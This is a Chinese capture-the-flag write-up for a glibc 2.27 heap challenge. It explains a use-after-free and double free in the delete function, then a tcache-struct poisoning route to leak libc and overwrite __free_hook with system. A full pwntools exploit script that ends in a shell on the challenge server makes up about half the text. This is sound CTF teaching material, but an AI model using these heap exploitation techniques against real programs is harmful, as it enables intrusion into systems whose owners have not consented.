保护全开,没给libc。
没给libc真可恶。
菜单
create
设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。
chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。
write
就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。
但是只能写一次。
show
正常show
delete
free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清理指针,造成uaf。那个指针可以重复使用,多次释放,可以double free。
思路是啥
首先我们需要知道libc的版本。
先尝试一次double free,看报不报错,或者报错类型,来看看libc版本是2.23 2.27还是2.29及以上。
因为2.23的话就会直接报double free。
2.29及以上会报tcache dup 2.
最后double free啥都不报,确定了2.27的版本,具体2。27那个版本一会试一试就清楚了。
再说解题,我们现在有double free,首要任务是泄露libc,但是我们的chunk只能申请到0x60大小,所以首先想到的是攻击tcache struct。所以首先就通过double free泄露heap地址,然后污染tcache struct,释放掉它,得到libc地址。
得到之后再怎么利用,常规来讲我们只需要利用double free去攻击free_hook就好啦。
但是因为tcache被污染了,我们只能提前申请好大小合适的chunk,然后free进入tcache,或者我这里利用的方法是tcache中有一个残留的指针,只需要提前留几个0x30的chunk,方便申请,就可以直接利用残留的指针攻击free_hook。
exp
from pwn import*
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
#r = process("./moon")
r = remote("pwn.challenge.ctf.show", 28098)
elf = ELF("./moon")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./64/libc-2.27.so")
def add(title):
r.sendlineafter("Choice: ", "1")
r.sendlineafter("Title: ", title)
def edit(title, size, content):
r.sendlineafter("Choice: ", "2")
r.sendlineafter("write content: ", title)
r.sendlineafter("Size of content: ", str(size))
r.sendlineafter("Content: ", content)
def show(title):
r.sendlineafter("Choice: ", "3")
r.sendlineafter("show content: ", title)
def delete(title):
r.sendlineafter("Choice: ", "4")
r.sendlineafter("delete: ", title)
printf_got = elf.got['printf']
add("1")
edit("1", 0x30, "a")
delete("1")
add("1")
delete("1")
add("1")
show("1")
heap_addr = u64(r.recv(6) + '\x00\x00') - 0x280
print "heap_addr = " + hex(heap_addr)
add("0")
add("00")
add("000")
add("0000")
edit("0000", 0x10, "/bin/sh")
add("2")
edit("2", 0x50, "")
delete("2")
add("2")
delete("2")
add("3")
add("4")
edit("4", 0x50, p64(heap_addr))
add("5")
edit("5", 0x50, "aaaa")
add("6")
edit("6", 0x50, "a" * 64)
delete("6")
add("6")
show("6")
libc_base = u64(r.recvuntil("\x7f")[-6:] + '\x00\x00') - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
print "libc_base = " + hex(libc_base)
delete("0")
add("bbbb")
edit("bbbb", 0x30, p64(free_hook))
delete("00")
delete("000")
add("cccc")
edit("cccc", 0x30, p64(system_addr))
add("dddd")
edit("dddd", 0x30, p64(system_addr))
delete("0000")
r.sendline("cat flag")
r.interactive()